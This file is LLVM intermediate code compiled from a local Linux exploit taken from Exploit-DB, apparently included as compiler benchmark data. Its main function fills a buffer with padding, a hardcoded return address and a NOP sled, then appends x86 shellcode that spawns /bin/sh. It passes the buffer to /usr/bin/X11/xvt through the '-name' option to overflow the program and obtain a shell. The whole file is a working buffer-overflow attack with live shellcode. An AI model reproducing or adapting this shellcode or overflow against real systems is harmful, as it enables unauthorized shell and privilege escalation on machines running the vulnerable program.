; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/linux/local/extr_20986.c_main.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/linux/local/extr_20986.c_main.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@__const.main.code = private unnamed_addr constant [46 x i8] c"\EB\1F^\89v\081\C0\88F\07\89F\0C\B0\0B\89\F3\8DN\08\8DV\0C\CD\801\DB\89\D8@\CD\80\E8\DC\FF\FF\FF/bin/sh\00", align 16
@.str = private unnamed_addr constant [17 x i8] c"/usr/bin/X11/xvt\00", align 1
@.str.1 = private unnamed_addr constant [4 x i8] c"xvt\00", align 1
@.str.2 = private unnamed_addr constant [6 x i8] c"-name\00", align 1

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @main() #0 {
  %1 = alloca i32, align 4
  %2 = alloca [234 x i8], align 16
  %3 = alloca i32, align 4
  %4 = alloca [46 x i8], align 16
  store i32 0, i32* %1, align 4
  %5 = bitcast [46 x i8]* %4 to i8*
  call void @llvm.memcpy.p0i8.p0i8.i64(i8* align 16 %5, i8* align 16 getelementptr inbounds ([46 x i8], [46 x i8]* @__const.main.code, i32 0, i32 0), i64 46, i1 false)
  store i32 0, i32* %3, align 4
  br label %6

6:                                                ; preds = %13, %0
  %7 = load i32, i32* %3, align 4
  %8 = icmp slt i32 %7, 76
  br i1 %8, label %9, label %16

9:                                                ; preds = %6
  %10 = load i32, i32* %3, align 4
  %11 = sext i32 %10 to i64
  %12 = getelementptr inbounds [234 x i8], [234 x i8]* %2, i64 0, i64 %11
  store i8 65, i8* %12, align 1
  br label %13

13:                                               ; preds = %9
  %14 = load i32, i32* %3, align 4
  %15 = add nsw i32 %14, 1
  store i32 %15, i32* %3, align 4
  br label %6

16:                                               ; preds = %6
  %17 = getelementptr inbounds [234 x i8], [234 x i8]* %2, i64 0, i64 76
  %18 = bitcast i8* %17 to i64*
  store i64 3221224112, i64* %18, align 4
  %19 = getelementptr inbounds [234 x i8], [234 x i8]* %2, i64 0, i64 0
  %20 = getelementptr inbounds i8, i8* %19, i64 80
  %21 = call i32 @memset(i8* %20, i32 144, i32 234)
  %22 = getelementptr inbounds [234 x i8], [234 x i8]* %2, i64 0, i64 0
  %23 = getelementptr inbounds i8, i8* %22, i64 233
  %24 = getelementptr inbounds [46 x i8], [46 x i8]* %4, i64 0, i64 0
  %25 = call i32 @strlen(i8* %24)
  %26 = sext i32 %25 to i64
  %27 = sub i64 0, %26
  %28 = getelementptr inbounds i8, i8* %23, i64 %27
  %29 = getelementptr inbounds [46 x i8], [46 x i8]* %4, i64 0, i64 0
  %30 = getelementptr inbounds [46 x i8], [46 x i8]* %4, i64 0, i64 0
  %31 = call i32 @strlen(i8* %30)
  %32 = call i32 @memcpy(i8* %28, i8* %29, i32 %31)
  %33 = getelementptr inbounds [234 x i8], [234 x i8]* %2, i64 0, i64 234
  store i8 0, i8* %33, align 2
  %34 = getelementptr inbounds [234 x i8], [234 x i8]* %2, i64 0, i64 0
  %35 = call i32 @execl(i8* getelementptr inbounds ([17 x i8], [17 x i8]* @.str, i64 0, i64 0), i8* getelementptr inbounds ([4 x i8], [4 x i8]* @.str.1, i64 0, i64 0), i8* getelementptr inbounds ([6 x i8], [6 x i8]* @.str.2, i64 0, i64 0), i8* %34, i32 0)
  %36 = load i32, i32* %1, align 4
  ret i32 %36
}

; Function Attrs: argmemonly nounwind willreturn
declare void @llvm.memcpy.p0i8.p0i8.i64(i8* noalias nocapture writeonly, i8* noalias nocapture readonly, i64, i1 immarg) #1

declare dso_local i32 @memset(i8*, i32, i32) #2

declare dso_local i32 @memcpy(i8*, i8*, i32) #2

declare dso_local i32 @strlen(i8*) #2

declare dso_local i32 @execl(i8*, i8*, i8*, i8*, i32) #2


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
